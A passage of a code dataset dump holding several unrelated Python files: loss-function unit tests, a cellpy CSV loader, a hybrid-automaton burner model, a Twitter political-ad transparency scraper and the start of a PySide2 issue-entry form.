3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, 0:2, :, :] = array_eye\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n\n num = 2 * np.array([6, 6, 6])\n denom = np.array([9, 9, 9]) + np.array([6, 6, 6])\n\n expect = 1 - (num / denom)\n get = label.single_scale_loss(tensor_eye, tensor_pred, \"dice\")\n assert is_equal_tf(get, expect)\n\n\ndef test_single_scale_loss_bce():\n \"\"\"\n Testing bce single scale loss entry\n returns known loss tensor for given inputs.\n \"\"\"\n array_eye = np.identity(3, dtype=np.float32)\n 
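# Construct partially overlapping inputs: the ground truth repeats the eye\n    # pattern in every slice along axis 1, while the prediction fills only the\n    # first two slices, so the expected cross-entropy below is non-trivial.\n    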
tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, 0:2, :, :] = array_eye\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n\n expect = [1.7908996, 1.7908996, 1.7908996]\n get = label.single_scale_loss(tensor_eye, tensor_pred, \"cross-entropy\")\n\n assert is_equal_tf(get, expect)\n\n\ndef test_single_scale_loss_dg():\n \"\"\"\n Testing generalised dice loss single\n scale loss function returns known loss\n tensor for given inputs.\n \"\"\"\n array_eye = 0.6 * np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, 0:2, :, :] = array_eye\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n\n y_prod = np.sum(tensor_eye * tensor_pred, axis=(1, 2, 3))\n y_sum = np.sum(tensor_eye, axis=(1, 2, 3)) + np.sum(tensor_pred, axis=(1, 2, 3))\n\n num = 2 * y_prod\n den = y_sum\n expect = 1 - num / den\n get = label.single_scale_loss(tensor_eye, tensor_pred, \"dice_generalized\")\n assert is_equal_tf(get, expect)\n\n\ndef test_single_scale_loss_jacc():\n \"\"\"\n Testing single scale loss returns known loss\n tensor when called with jaccard argment.\n \"\"\"\n array_eye = np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, 0:2, :, :] = array_eye\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n\n num = np.array([6, 6, 6])\n denom = np.array([9, 9, 9]) + np.array([6, 6, 6]) - num\n\n expect = 1 - (num / denom)\n get = label.single_scale_loss(tensor_eye, tensor_pred, \"jaccard\")\n assert is_equal_tf(get, expect)\n\n\ndef test_single_scale_loss_mean_sq():\n \"\"\"\n Test single scale loss function returns\n known mean sq value tensor when passed with\n mean squared arg,\n \"\"\"\n tensor_mask = np.zeros((3, 3, 3, 3))\n tensor_mask[0, 0, 0, 0] = 1\n tensor_mask = tf.convert_to_tensor(tensor_mask, dtype=tf.float32)\n\n tensor_pred = tf.convert_to_tensor(np.ones((3, 3, 3, 3)), dtype=tf.float32)\n expect = tf.convert_to_tensor(np.array([26 / 27, 1.0, 1.0]), dtype=tf.float32)\n\n get = label.single_scale_loss(tensor_mask, tensor_pred, \"mean-squared\")\n assert is_equal_tf(get, expect)\n\n\ndef test_single_scale_loss_other():\n \"\"\"\n Test value error raised if non supported\n string passed to the single scale loss function.\n \"\"\"\n tensor_eye = tf.convert_to_tensor(np.zeros((3, 3, 3, 3)), dtype=tf.float32)\n tensor_pred = tf.convert_to_tensor(np.zeros((3, 3, 3, 3)), dtype=tf.float32)\n\n with pytest.raises(ValueError):\n label.single_scale_loss(tensor_eye, tensor_pred, \"random\")\n\n\ndef test_multi_scale_loss_pred_len():\n \"\"\"\n Test assertion error raised if a wrongly sized tensor\n is passed to the multi-scale loss function.\n \"\"\"\n tensor_true = tf.convert_to_tensor(np.zeros((3, 3, 3, 3)), dtype=tf.float32)\n tensor_pred = tf.convert_to_tensor(np.zeros((3, 3, 3)), dtype=tf.float32)\n with pytest.raises(AssertionError):\n label.multi_scale_loss(\n tensor_true, tensor_pred, loss_type=\"jaccard\", loss_scales=[0, 1, 2]\n )\n\n\ndef 
test_multi_scale_loss_true_len():\n \"\"\"\n Test assertion error raised if a wrongly sized tensor\n is passed to the multi-scale loss function.\n \"\"\"\n tensor_true = tf.convert_to_tensor(np.zeros((3, 3, 3)), dtype=tf.float32)\n tensor_pred = tf.convert_to_tensor(np.zeros((3, 3, 3, 3)), dtype=tf.float32)\n with pytest.raises(AssertionError):\n label.multi_scale_loss(\n tensor_true, tensor_pred, loss_type=\"jaccard\", loss_scales=[0, 1, 2]\n )\n\n\ndef test_multi_scale_loss_kernel():\n \"\"\"\n Test multi-scale loss kernel returns the appropriate\n loss tensor for same inputs and jaccard cal.\n \"\"\"\n loss_values = [1, 2, 3]\n array_eye = np.identity(3, dtype=np.float32)\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_pred[:, :, 0, 0] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n expect = tf.constant([0.9938445, 0.9924956, 0.9938445], dtype=tf.float32)\n get = label.multi_scale_loss(tensor_eye, tensor_pred, \"jaccard\", loss_values)\n assert is_equal_tf(get, expect)\n\n\nclass TestGetSimilarityFn:\n batch_size = 2\n image_size = (3, 4, 5)\n y_true = tf.zeros((batch_size, *image_size), dtype=tf.float32)\n y_pred = tf.zeros((batch_size, *image_size), dtype=tf.float32)\n\n def test_unknown_cases(self):\n \"\"\"\n Test dissimilarity function raises an error\n if an unknonw loss type is passed.\n \"\"\"\n config = {\"name\": \"random\"}\n with pytest.raises(ValueError) as err_info:\n label.get_dissimilarity_fn(config)\n assert \"Unknown loss type\" in str(err_info.value)\n\n @pytest.mark.parametrize(\n \"config\",\n [\n {\n \"name\": \"multi_scale\",\n \"multi_scale\": {\"loss_type\": \"jaccard\", \"loss_scales\": [0, 1, 2, 4]},\n },\n {\"name\": \"single_scale\", \"single_scale\": {\"loss_type\": \"jaccard\"}},\n ],\n )\n def test_known_cases(self, config):\n \"\"\"\n Asserting loss function returned by get dissimilarity\n function when appropriate strings passed.\n \"\"\"\n loss_fn = label.get_dissimilarity_fn(config)\n loss = loss_fn(y_true=self.y_true, y_pred=self.y_pred)\n assert loss.shape == (self.batch_size,)\n","sub_path":"test/unit/test_loss_label.py","file_name":"test_loss_label.py","file_ext":"py","file_size_in_byte":16292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"594921712","text":"import logging\nimport os\n\nimport pandas as pd\n\nfrom cellpy.parameters.internal_settings import get_headers_normal, ATTRS_CELLPYFILE\n\nfrom cellpy.readers.instruments.mixin import Loader\nfrom cellpy.readers.core import FileID, Cell, check64bit, humanize_bytes\nfrom cellpy.parameters import prms\n\nDEFAULT_CONFIG = {\n \"structure\": {\n \"format\": \"csv\",\n \"table_name\": None,\n \"header_definitions\": \"labels\",\n \"comment_chars\": (\"#\", \"!\"),\n \"sep\": \";\",\n \"locate_start_data_by\": \"line_number\",\n \"locate_end_data_by\": \"EOF\",\n \"locate_vars_by\": \"key_value_pairs\",\n \"start_data\": 19,\n \"header_info_line\": 1,\n \"start_data_offset\": 0,\n \"header_info_parse\": \"in_key\",\n \"header_info_splitter\": \";\",\n \"file_type_id_line\": 0,\n \"file_type_id_match\": None,\n },\n \"variables\": {\n \"mass\": \"mass\",\n \"total_mass\": \"total_mass\",\n \"schedule_file\": \"schedule_file\",\n \"schedule\": \"schedule\",\n \"creator\": \"operator\",\n \"loaded_from\": \"loaded_from\",\n 
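# each key below is a cellpy attribute name, and each value is the\n        # variable name expected in the custom data file's header section\n        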
\"channel_index\": \"channel_index\",\n \"channel_number\": \"channel_number\",\n \"item_ID\": \"instrument\",\n \"test_ID\": \"test_name\",\n \"cell_name\": \"cell\",\n \"material\": \"material\",\n \"counter_electrode\": \"counter\",\n \"reference_electrode\": \"reference\",\n \"start_datetime\": \"date\",\n \"fid_last_modification_time\": \"last_modified\",\n \"fid_size\": \"size\",\n \"fid_last_accessed\": \"last_accessed\",\n },\n \"headers\": {\n \"data_point_txt\": \"index\",\n \"charge_capacity_txt\": \"charge_capacity\",\n \"current_txt\": \"current\",\n \"cycle_index_txt\": \"cycle\",\n \"datetime_txt\": \"date_stamp\",\n \"discharge_capacity_txt\": \"discharge_Capacity\",\n \"step_index_txt\": \"step\",\n \"step_time_txt\": \"step_time\",\n \"test_time_txt\": \"test_time\",\n \"voltage_txt\": \"voltage\",\n },\n \"units\": {\"current\": 0.001, \"charge\": 0.001, \"mass\": 0.001, \"specific\": 1.0},\n \"limits\": {\n \"current_hard\": 0.0000000000001,\n \"current_soft\": 0.00001,\n \"stable_current_hard\": 2.0,\n \"stable_current_soft\": 4.0,\n \"stable_voltage_hard\": 2.0,\n \"stable_voltage_soft\": 4.0,\n \"stable_charge_hard\": 0.9,\n \"stable_charge_soft\": 5.0,\n \"ir_change\": 0.00001,\n },\n}\n\n\nclass CustomLoader(Loader):\n \"\"\" Class for loading cell data from custom formatted files.\n\n The file that contains the description of the custom data file\n should be given by issuing the\n pick_definition_file or given in the config file\n (prms.Instruments.custom_instrument_definitions_file)\n\n The format of the custom data file should be on the form\n\n ...\n # comment\n # ...\n variable sep value\n variable sep value\n ...\n header1 sep header2 sep ...\n value1 sep value2 sep ...\n ...\n\n where sep is either defined in the description file or the\n config file.\n\n The definition file should use the YAML format and it\n must contain\n\n xxx\n xxx\n\n\n \"\"\"\n\n def __init__(self):\n \"\"\"initiates the class\"\"\"\n\n self.logger = logging.getLogger(__name__)\n self.headers_normal = get_headers_normal()\n self.definition_file = self.pick_definition_file()\n self.units = None\n self.limits = None\n self.headers = None\n self.variables = None\n self.structure = None\n self.parse_definition_file()\n\n @staticmethod\n def pick_definition_file():\n return prms.Instruments.custom_instrument_definitions_file\n\n # TODO: @jepe - create yaml file example (from DEFAULT_CONFIG)\n # TODO: @jepe - create yaml file parser\n def parse_definition_file(self):\n if self.definition_file is None:\n logging.info(\"no definition file for custom format\")\n logging.info(\"using default settings\")\n settings = DEFAULT_CONFIG\n else:\n raise NotImplementedError\n\n self.units = settings[\"units\"]\n self.limits = settings[\"limits\"]\n self.headers = settings[\"headers\"]\n self.variables = settings[\"variables\"]\n self.structure = settings[\"structure\"]\n\n def get_raw_units(self):\n return self.units\n\n def get_raw_limits(self):\n return self.limits\n\n def _find_data_start(self, file_name, sep):\n if self.structure[\"locate_start_data_by\"] != \"line_number\":\n raise NotImplementedError\n if not self.structure[\"start_data\"] is None:\n return self.structure[\"start_data\"] + self.structure[\"start_data_offset\"]\n\n else:\n logging.debug(\"searching for line where data starts\")\n header_info_line = self.structure[\"header_info_line\"]\n header_info_parse = self.structure[\"header_info_parse\"]\n header_info_splitter = self.structure[\"header_info_splitter\"]\n header_info_line = 
self.structure[\"header_info_line\"]\n\n with open(file_name, \"rb\") as fp:\n for i, line_ in enumerate(fp):\n if i == header_info_line:\n line = line_.strip()\n line = line.decode()\n break\n\n if header_info_parse == \"in_key\":\n _, v = line.split(header_info_splitter)\n else:\n _, v = line.split(sep)\n v = int(v)\n return v\n\n def loader(self, file_name, **kwargs):\n new_tests = []\n if not os.path.isfile(file_name):\n self.logger.info(\"Missing file_\\n %s\" % file_name)\n return\n\n # find out strategy (based on structure)\n if self.structure[\"format\"] != \"csv\":\n raise NotImplementedError\n\n sep = self.structure.get(\"sep\", prms.Reader.sep)\n if sep is None:\n sep = prms.Reader.sep\n\n locate_vars_by = self.structure.get(\"locate_vars_by\", \"key_value_pairs\")\n comment_chars = self.structure.get(\"comment_chars\", [\"#\", \"!\"])\n header_row = self.structure.get(\"start_data\", None)\n if header_row is None:\n header_row = self._find_data_start(file_name, sep)\n\n # parse variables\n var_lines = []\n with open(file_name, \"rb\") as fp:\n for i, line in enumerate(fp):\n if i < header_row:\n line = line.strip()\n try:\n line = line.decode()\n except UnicodeDecodeError:\n logging.debug(\n \"UnicodeDecodeError: \" \"skipping this line: \" f\"{line}\"\n )\n else:\n if line.startswith(comment_chars):\n logging.debug(f\"Comment: {line}\")\n else:\n var_lines.append(line)\n else:\n break\n\n var_dict = dict()\n if locate_vars_by == \"key_value_pairs\":\n for line in var_lines:\n parts = line.split(sep)\n try:\n var_dict[parts[0]] = parts[1]\n except IndexError as e:\n logging.debug(f\"{e}\\ncould not split var-value\\n{line}\")\n\n else:\n raise NotImplementedError\n\n data = Cell()\n data.loaded_from = file_name\n fid = self._generate_fid(file_name, var_dict)\n\n # parsing cellpydata attributes\n for attribute in ATTRS_CELLPYFILE:\n key = self.variables.get(attribute, None)\n # print(f\"{attribute} -> {key}\")\n if key:\n val = var_dict.pop(key, None)\n if key in [\"mass\"]:\n val = float(val)\n # print(f\"{attribute}: {val}\")\n setattr(data, attribute, val)\n\n data.raw_data_files.append(fid)\n\n # setting optional attributes (will be implemented later I hope)\n key = self.variables.get(\"total_mass\", None)\n if key:\n total_mass = var_dict.pop(key, None)\n logging.debug(\"total_mass is given, but not propagated\")\n\n logging.debug(f\"unused vars: {var_dict}\")\n\n raw = self._parse_csv_data(file_name, sep, header_row)\n raw = self._rename_cols(raw)\n raw = self._check_cycleno_stepno(raw)\n data.raw_data_files_length.append(raw.shape[0])\n data.summary = None\n data.raw = raw\n new_tests.append(data)\n return new_tests\n\n def _parse_csv_data(self, file_name, sep, header_row):\n raw = pd.read_csv(file_name, sep=sep, header=header_row, skip_blank_lines=False)\n return raw\n\n def _rename_cols(self, raw):\n rename_col_dict = dict()\n\n for col_def in self.headers:\n new_name = self.headers_normal[col_def]\n old_name = self.headers[col_def]\n if old_name in raw.columns:\n rename_col_dict[old_name] = new_name\n\n raw = raw.rename(columns=rename_col_dict)\n return raw\n\n # TODO: @jepe - finalize the _check sub-modules\n\n def _check_cycleno_stepno(self, raw):\n return raw\n\n def _convert_to_cellpy_units(self, data):\n return data\n\n def _check_columns(self, data):\n return data\n\n def _check_dtypes(self, data):\n return data\n\n def _generate_fid(self, file_name, var_dict):\n fid = FileID()\n last_modified = var_dict.get(self.variables[\"fid_last_modification_time\"], None)\n 
size = var_dict.get(self.variables[\"fid_size\"], None)\n last_accessed = var_dict.get(self.variables[\"fid_last_accessed\"], None)\n\n if any([last_modified, size, last_accessed]):\n fid.name = os.path.abspath(file_name)\n fid.full_name = file_name\n fid.location = os.path.dirname(file_name)\n\n fid.size = size\n fid.last_modified = last_modified\n fid.last_accessed = last_accessed\n fid.last_info_changed = last_accessed\n else:\n fid.populate(file_name)\n\n return fid\n\n def inspect(self, data):\n data = self._convert_to_cellpy_units(data)\n data = self._check_columns(data)\n data = self._check_dtypes(data)\n return data\n\n def load(self, file_name):\n \"\"\"Load a raw data-file\n\n Args:\n file_name (path)\n\n Returns:\n loaded test\n \"\"\"\n\n new_rundata = self.loader(file_name)\n new_rundata = self.inspect(new_rundata)\n return new_rundata\n\n\nif __name__ == \"__main__\":\n import pathlib\n from pprint import pprint\n\n print(\"running this\")\n loader = CustomLoader()\n # loader.pick_definition_file()\n datadir = \"/Users/jepe/scripting/cellpy/test_data\"\n datadir = pathlib.Path(datadir)\n my_file_name = datadir / \"custom_data_001.csv\"\n # print(help(loader.get_raw_units))\n # print(help(loader.get_raw_limits))\n # print(f\"Trying to load {my_file_name}\")\n loader.load(my_file_name)\n","sub_path":"cellpy/readers/instruments/custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":11073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"162609018","text":"import macropy.activate\nfrom language import *\nfrom gen import *\nfrom sympy import *\nimport shac\n\nsignal_u=Symbol('signal_u')\n\n# Burner for the watertank\n\node0 = Ode(sympify(\"diff(y(t))\"), sympify(\"y(t)\"), 0, {})\node1 = Ode(sympify(\"diff(y(t))-1\"), sympify(\"y(t)\"), 0, {})\n\n\n# The locations of the hybrid automaton\nb1 = Loc(\"b1\", [ode0], [],\n {S(\"y(t)\"): [Guard(S(\"y>=0\")), Guard(S(\"y <= 0\"))]})\nb2 = Loc(\"b2\", [ode1], [],\n {S(\"y(t)\"): [Guard(S(\"y < 0.1\"))]})\nb3 = Loc(\"b3\", [ode0], [],\n {S(\"y(t)\"): [Guard(S(\"y>=0\")), Guard(S(\"y <= 0\"))]})\nb4 = Loc(\"b4\", [ode1], [],\n {S(\"y(t)\"): [Guard(S(\"y < 0.1\"))]})\n\n# The edges\ne1 = Edge('b1', 'b2', {S(\"y(t)\"): [Guard(sympify(\"True\"))]},\n [Update.Update1(Symbol('y'), Symbol('y'))],\n [Event(\"TURN_ON\")])\n\ne2 = Edge('b2', 'b3', {S(\"y(t)\"): [Guard(S(\"y>= 0.1\"))]},\n [Update.Update1(Symbol('y'), Symbol('0')),\n Update.Update1(Symbol('signal'), Symbol('1'))],\n [])\n\ne3 = Edge('b3', 'b4', {S(\"y(t)\"): [Guard(sympify(\"True\"))]},\n [Update.Update1(Symbol('y'), Symbol('y'))],\n [Event(\"TURN_OFF\")])\n\ne4 = Edge('b4', 'b1', {S(\"y(t)\"): [Guard(S(\"y>= 0.1\"))]},\n [Update.Update1(Symbol('y'), Symbol('0')),\n Update.Update1(Symbol('signal'), Symbol('0'))],\n [])\n\n\nburner = Ha(\"burner\", [b1, b2, b3, b4], b1,\n [e1, e2, e3, e4], [], [signal_u])\n\n# Compile\n# shac.compile(burner)\n","sub_path":"examples/TSE2015/Piha/watertank&burner/burner.py","file_name":"burner.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"168499303","text":"import configparser\nimport csv\nimport datetime\nimport json\nimport os\nimport random\nimport shutil\nimport smtplib\nimport sys\nimport time\nfrom email.mime.text import MIMEText\nfrom pprint import pprint\n\nimport lxml\nimport requests\nfrom bs4 import BeautifulSoup\n#import oauth2 as oauth\nfrom requests_oauthlib import 
OAuth1Session\nfrom twitter import *\n\nif len(sys.argv) < 2:\n exit(\"Usage:python3 FBAdScrapeScript.py crawl_config.cfg [Optional: TwitterHandles.csv]\")\n\nTwitterHandlesFile = ''\n\nif len(sys.argv) == 2:\n CrawlFile = sys.argv[1]\n TwitterHandlesFile = 'congress.csv' #Default if a new handles file is not provided. \n TwitterHandles = False\n\nif len(sys.argv) == 3:\n TwitterHandlesFile = sys.argv[2] # A new twitter handles file is provided. \n TwitterHandles = True\n\n\nconfig = configparser.ConfigParser()\nconfig.read(sys.argv[1])\n\nUSERNAME = config['ACCOUNT']['USERNAME']\nPASSWORD = config['ACCOUNT']['PASS']\nSCRAPEREMAIL = config['ACCOUNT']['EMAIL']\nCONSUMER_KEY = config['OAUTH']['CONSUMERKEY']\nCONSUMER_SECRET = config['OAUTH']['CONSUMERSECRET']\nACCESS_KEY_TOKEN = config['OAUTH']['TOKENKEY']\nACCESS_KEY_SECRET = config['OAUTH']['TOKENSECRET']\nMASTERSEEDLIST = config['SEEDLIST']['MASTERSEEDFILE']\nPAGESPERUSER = int(config['SPECS']['PAGES'])\nMINWAIT = int(config['SPECS']['MINWAITUSER'])\nMAXWAIT = int(config['SPECS']['MAXWAITUSER'])\nERROREMAIL = config['ACCOUNT']['ERROREMAIL']\nJSON_INDENT = int(config['SPECS']['JSON_INDENT'])\n\n\nTwitterAPI = Twitter(auth=OAuth(ACCESS_KEY_TOKEN, ACCESS_KEY_SECRET, \n CONSUMER_KEY, CONSUMER_SECRET))\n\n\nLoginPost = \"https://twitter.com/sessions\"\nURL = \"https://twitter.com\"\nPolUserLink = \"https://ads.twitter.com/transparency/political_advertisers.json?\"\nTweetsLinkForUser = \"https://ads.twitter.com/transparency/tweets_timeline.json?user_id=%s&cursor=%s\"\nSearchUserLink = 'https://api.twitter.com/1.1/users/search.json?q=%s&count=20&filter:verified'\n\ndata = {\"session[username_or_email]\": USERNAME,\n \"session[password]\": PASSWORD,\n \"scribe_log\": \"\",\n \"redirect_after_login\": \"/\",\n \"remember_me\": \"1\"}\n\nnow = datetime.datetime.now()\nnow_str = \"\".join(str(e) for e in [now.year, now.month, now.day, now.hour])\nWriteDir = 'NEWcrawl_'+ now_str # Adding NEW so DB parser doesn't try to parse this until it's complete.\n\nHeaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}\n\n\n\n\n\ndef GetUsersWithPoliticalAds(Keyword, Session, TwitterHandles):\n print(\"Getting tweets for keyword \", Keyword)\n UsersFromKeyword = []\n PayloadToWrite = {}\n\n if TwitterHandles: # If the twitter handles file, then just make a simple query to get user metadata\n UsersFromKeyword = TwitterAPI.users.search(q=Keyword, include_ext_highlighted_label=True)\n else:\n for i in range(1, PAGESPERUSER+1): # If just keyword search, then make a deep search for all results. 
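\n            # Pages through up to PAGESPERUSER result pages of 20 users each.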
\n            TwitterResponse = TwitterAPI.users.search(q=Keyword, count=20, include_ext_highlighted_label=True, page=i)\n            UsersFromKeyword.extend(TwitterResponse)\n            #print(UsersFromKeyword)\n            time.sleep(random.randint(MINWAIT, MAXWAIT))\n    count=0\n    for User in UsersFromKeyword:\n        UserID = User['id_str']\n        if User['verified'] or TwitterHandles: #If curated list of twitter handles, don't check for verified stamp\n            ScreenName = User['screen_name']\n            Tweets = GetTweetsForUser(UserID, ScreenName)\n            if Tweets:\n                count+=1\n                if count>1:\n                    SendErrorEmail(\"The user search returned multiple hits for \" + Keyword)\n                PayloadToWrite[User['id_str']] = {}\n                PayloadToWrite[User['id_str']]['ScreenName'] = ScreenName\n                PayloadToWrite[User['id_str']]['Tweets'] = Tweets\n\n                WriteToDisk(ScreenName, PayloadToWrite, \"Tweets\")\n        time.sleep(random.randint(MINWAIT,MAXWAIT))\n\n\n\n\n\ndef GetTweetsForUser(UserID, ScreenName):\n    \"\"\"\n    Gets all the political ads for every user.\n    Works around infinite scrolling by setting the 'cursor'\n    parameter.\n    \"\"\"\n    MoreTweets = True\n    Count = 0\n    ErrorCount = 0\n    AllTweets = []\n\n    while MoreTweets:\n        try:\n            Tweets = Session.get(TweetsLinkForUser % (UserID, Count), headers=Headers)\n            if Tweets.status_code == 200:\n                Tweets = json.loads(Tweets.text)[\"tweets\"]\n                if len(Tweets):\n                    AllTweets.extend(Tweets)\n                    Count += 1\n                else:\n                    MoreTweets = False\n            else:\n                SendErrorEmail(\"Not 200 code on \" + TweetsLinkForUser % (UserID, Count))\n                ErrorCount += 1\n                if ErrorCount == 10:\n                    MoreTweets = False\n                    SendErrorEmail(\"Exiting scraping tweets for \" + TweetsLinkForUser % (UserID, Count))\n        except Exception as e:\n            SendErrorEmail(\"Error with \" + TweetsLinkForUser % (UserID, Count) + \" Error: \" + str(e))\n        time.sleep(random.randint(MINWAIT,MAXWAIT))\n    return AllTweets\n\n\n\n\n\ndef WriteToDisk(ScreenName, PayloadToWrite, Type):\n\n    if not os.path.exists(WriteDir):\n        os.makedirs(WriteDir)\n\n    if not os.path.exists(os.path.join(WriteDir, ScreenName)):\n        os.makedirs(os.path.join(WriteDir, ScreenName))\n\n    UserFolder = os.path.join(WriteDir, ScreenName)\n\n    File = os.path.join(UserFolder, Type) + '.json'\n\n    with open(File, 'w') as f:\n        json.dump(PayloadToWrite, f, indent=JSON_INDENT)\n\n    return\n\n\n\n\n\ndef extractSeedWordsCSV(FirstName = True, LastName = True):\n    \"\"\"\n    Names of Political Candidates in the CSV format.
\n    The default parameters allow us to choose whether we want to get first names\n    or last names.\n    \"\"\"\n    if TwitterHandlesFile.lower().startswith(\"twitter\"):\n        with open(TwitterHandlesFile) as f:\n            CurrentSeeds = set([seedWord[2].strip()[len('@'):].lower() for seedWord in csv.reader(f) if seedWord[2].strip()[len('@'):] != \"\"])\n    else:\n        with open(TwitterHandlesFile, 'r') as f:\n            CurrentSeeds = set([' '.join(seedWord).strip() for seedWord in csv.reader(f) if seedWord])\n            f.seek(0)\n            CurrentSeeds.update(set([seedWord[1] for seedWord in csv.reader(f) if seedWord]))\n\n    with open(MASTERSEEDLIST, 'a+') as f:\n        f.seek(0)\n        SeedsMaster = set([Seed.strip() for Seed in f.readlines()])\n        for Seed in CurrentSeeds:\n            if Seed not in SeedsMaster:\n                f.write(Seed + '\\n')\n\n    return CurrentSeeds\n\n\n\n\n\ndef AddPolUsersLink(TotalSeeds, Session):\n    AllPolUsersFromLink = Session.get(PolUserLink, headers=Headers)\n    if AllPolUsersFromLink.status_code == 200:\n        AllUsers = json.loads(AllPolUsersFromLink.text)['users']\n        for User in AllUsers:\n            TotalSeeds.add(User['screenName'].lower())\n    else:\n        SendErrorEmail(\"Not 200 code on \" + PolUserLink)\n\n    return TotalSeeds\n\n\n\n\n\ndef SendErrorEmail(ErrorMessage):\n    msg = MIMEText(str(ErrorMessage))\n    msg['from'] = SCRAPEREMAIL\n    msg['to'] = ERROREMAIL\n    msg['subject'] = 'Error in getting tweets script'\n    s = smtplib.SMTP('smtp.live.com', 25)\n    s.ehlo()\n    s.starttls()\n    s.login(SCRAPEREMAIL, PASSWORD)\n    s.sendmail(SCRAPEREMAIL, [ERROREMAIL], msg.as_string())\n    s.quit()\n\n\n\n\n\nif __name__ == \"__main__\":\n    Start = time.time()\n    Count = 0\n    UsersWithPol = []\n    with requests.Session() as Session:\n\n        Resp = Session.get(URL, headers=Headers)\n        # get auth token\n        soup = BeautifulSoup(Resp.content, \"lxml\")\n        AUTH_TOKEN = soup.select_one(\"input[name=authenticity_token]\")[\"value\"]\n        # update data, post and you are logged in.\n        data[\"authenticity_token\"] = AUTH_TOKEN\n        Resp = Session.post(LoginPost, data=data, headers=Headers)\n        print(\"Handles file\", TwitterHandlesFile)\n        TotalSeeds = extractSeedWordsCSV()\n        print(len(TotalSeeds))\n        TotalSeeds = AddPolUsersLink(TotalSeeds, Session)\n        print(len(TotalSeeds))\n        #for Keyword in open(\"Keywords.txt\"):\n        for Keyword in TotalSeeds:\n            Count += 1\n            print(\"Seed # %s out of %s\" % (Count, len(TotalSeeds)))\n            print(\"Twitter Handles: \", TwitterHandles)\n            GetUsersWithPoliticalAds(Keyword.strip(), Session, TwitterHandles)\n            time.sleep(random.randint(MINWAIT//10,MAXWAIT//10))\n    FinalNameDir = WriteDir[3:]\n    shutil.move(WriteDir, FinalNameDir)\n    config.set(\"WORKINGDIR\", \"CURRENT\", FinalNameDir)\n    with open(sys.argv[1], 'w') as configfile:\n        config.write(configfile)\n    print(\"Total time to get tweets from users: \", time.time()-Start)\n","sub_path":"GetTwitterUserPolAds.py","file_name":"GetTwitterUserPolAds.py","file_ext":"py","file_size_in_byte":8249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"236060939","text":"\nfrom PySide2.QtWidgets import QWidget, QScrollArea, QLabel, QDateTimeEdit, QComboBox, QTextEdit, \\\n    QPushButton, QVBoxLayout, QHBoxLayout, QFormLayout, QFrame, QMessageBox\nfrom PySide2.QtGui import QIcon, QPixmap, Qt\nfrom PySide2.QtCore import QDateTime\n\n\nimport backend\n\ndb = backend.Database(\"sr-data.db\")\n\ndefaultImg = \"assets/icons/logo-dark.png\"\n\n\nclass AddIssue(QWidget):\n    def __init__(self, parent):\n        QWidget.__init__(self)\n        self.setWindowTitle(\"Add issue\")\n        self.setWindowIcon(QIcon(\"assets/icons/icon.ico\"))\n
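        # Window geometry below is x, y, width, height in pixels.\n        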
self.setGeometry(450, 150, 750, 950)\n # self.setFixedSize(self.size())\n\n self.Parent = parent\n\n self.UI()\n self.show()\n\n def UI(self):\n self.widgets()\n self.layouts()\n\n def widgets(self):\n self.scroll = QScrollArea()\n self.scroll.setWidgetResizable(True)\n\n # Top layout widgets\n self.addIssueImg = QLabel()\n self.img = QPixmap('assets/icons/create-issue.png')\n self.addIssueImg.setPixmap(self.img)\n self.addIssueImg.setAlignment(Qt.AlignCenter)\n self.titleText = QLabel(\"Add issue\")\n self.titleText.setAlignment(Qt.AlignCenter)\n # Middle layout widgets\n self.issueInfoTitleText = QLabel(\"Issue info\")\n self.issueInfoTitleText.setAlignment(Qt.AlignCenter)\n self.dateEntry = QDateTimeEdit()\n self.dateEntry.setDateTime(QDateTime.currentDateTime())\n self.priorityEntry = QComboBox()\n self.priorityEntry.setEditable(True)\n self.observerEntry = QComboBox()\n self.observerEntry.setEditable(True)\n self.revisionTeamEntry = QComboBox()\n self.revisionTeamEntry.setEditable(True)\n self.inspectionNameEntry = QComboBox()\n self.inspectionNameEntry.setEditable(True)\n self.observationThemeEntry = QComboBox()\n self.observationThemeEntry.setEditable(True)\n self.facilityEntry = QComboBox()\n self.facilityEntry.setEditable(True)\n self.facilitySupervisorEntry = QComboBox()\n self.facilitySupervisorEntry.setEditable(True)\n self.specificLocationEntry = QTextEdit()\n 